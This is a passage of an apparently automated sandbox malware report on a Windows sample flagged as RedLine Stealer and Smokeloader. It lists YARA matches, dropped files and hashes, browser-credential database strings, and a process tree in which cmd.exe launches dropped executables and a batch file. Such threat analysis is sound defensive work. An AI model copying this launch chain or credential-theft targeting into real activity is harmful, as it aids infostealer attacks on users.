Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F53C8 0_2_6C5F53C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58F380 0_2_6C58F380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63AC60 0_2_6C63AC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70AC30 0_2_6C70AC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F6C00 0_2_6C6F6C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62ECC0 0_2_6C62ECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68ECD0 0_2_6C68ECD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FED70 0_2_6C6FED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C75AD50 0_2_6C75AD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7B8D20 0_2_6C7B8D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7BCDC0 0_2_6C7BCDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C634DB0 0_2_6C634DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C6D90 0_2_6C6C6D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6CEE70 0_2_6C6CEE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C710E20 0_2_6C710E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63AEC0 0_2_6C63AEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D0EC0 0_2_6C6D0EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6B6E90 0_2_6C6B6E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F2F70 0_2_6C6F2F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69EF40 0_2_6C69EF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770F20 0_2_6C770F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C636F10 0_2_6C636F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C70EFF0 0_2_6C70EFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C630FE0 0_2_6C630FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C778FB0 0_2_6C778FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63EFB0 0_2_6C63EFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C704840 0_2_6C704840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C680820 0_2_6C680820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6BA820 0_2_6C6BA820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7368E0 0_2_6C7368E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71C8C0 0_2_6C71C8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C668960 0_2_6C668960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C686900 0_2_6C686900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74C9E0 0_2_6C74C9E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6649F0 0_2_6C6649F0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5C94D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5BCBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C7B09D0 appears 79 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 2368
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2443224125.000000000244C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2468067392.000000006C612000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000015.00000002.2792244959.00000000026FD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2443590110.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000015.00000002.2794658661.0000000004080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002C.00000002.2902291876.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2443437674.000000000271D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.19.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 48f0ec6733.exe.19.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: random[1].exe.0.dr Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: enter[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: enter[1].exe.0.dr Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: RoamingIJDGCAEBFI.exe.0.dr Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: axplong.exe.5.dr Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: axplong.exe.5.dr Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: explorti.exe.8.dr Static PE information: Section: ZLIB complexity 0.9998612534153005
Source: explorti.exe.8.dr Static PE information: Section: usoriijt ZLIB complexity 0.9945536283368326
Source: axplong.exe.5.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: RoamingCBFCFBFBFB.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@141/390@137/41
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C5E7030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\XJMWU3X2.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7496
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3436
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA3E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INSERT OR IGNORE INTO index_data (index_id, value, object_data_key, object_store_id, value_locale) VALUES (:index_id, :value, :object_data_key, :object_store_id, :value_locale);
Source: softokn3[1].dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000003.2120221543.0000000022C95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2104567912.0000000022C79000.00000004.00000020.00020000.00000000.sdmp, IEHCBAFIDAECBGCBFHJE.0.dr, CFIIIJJKJKFHIDGDBAKJ.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.2467474924.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2456586548.000000001CBA5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: RoamingCBFCFBFBFB.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RoamingIJDGCAEBFI.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 2368
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1048
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\ee7a49fbf0.exe "C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2252,i,8316535468258998242,13647816152217596395,262144 /prefetch:8
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2104,i,9402509172041055831,1536830809750770573,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=3020 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2268 -parentBuildID 20230927232528 -prefsHandle 2188 -prefMapHandle 2148 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3d9a631-0c4f-4452-8e9e-490c2e469294} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16dcc56d910 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6772 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6916 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4548 -parentBuildID 20230927232528 -prefsHandle 4540 -prefMapHandle 4536 -prefsLen 26338 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3a73529-841c-43f4-a1e0-97d887784ff3} 6968 "\\.\pipe\gecko-crash-server-pipe.6968" 16ddf13f710 rdd
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-GB --service-sandbox-type=audio --mojo-platform-channel-handle=7960 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=8128 --field-trial-handle=2744,i,8170982657460856401,12893479799030225772,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\ee7a49fbf0.exe "C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
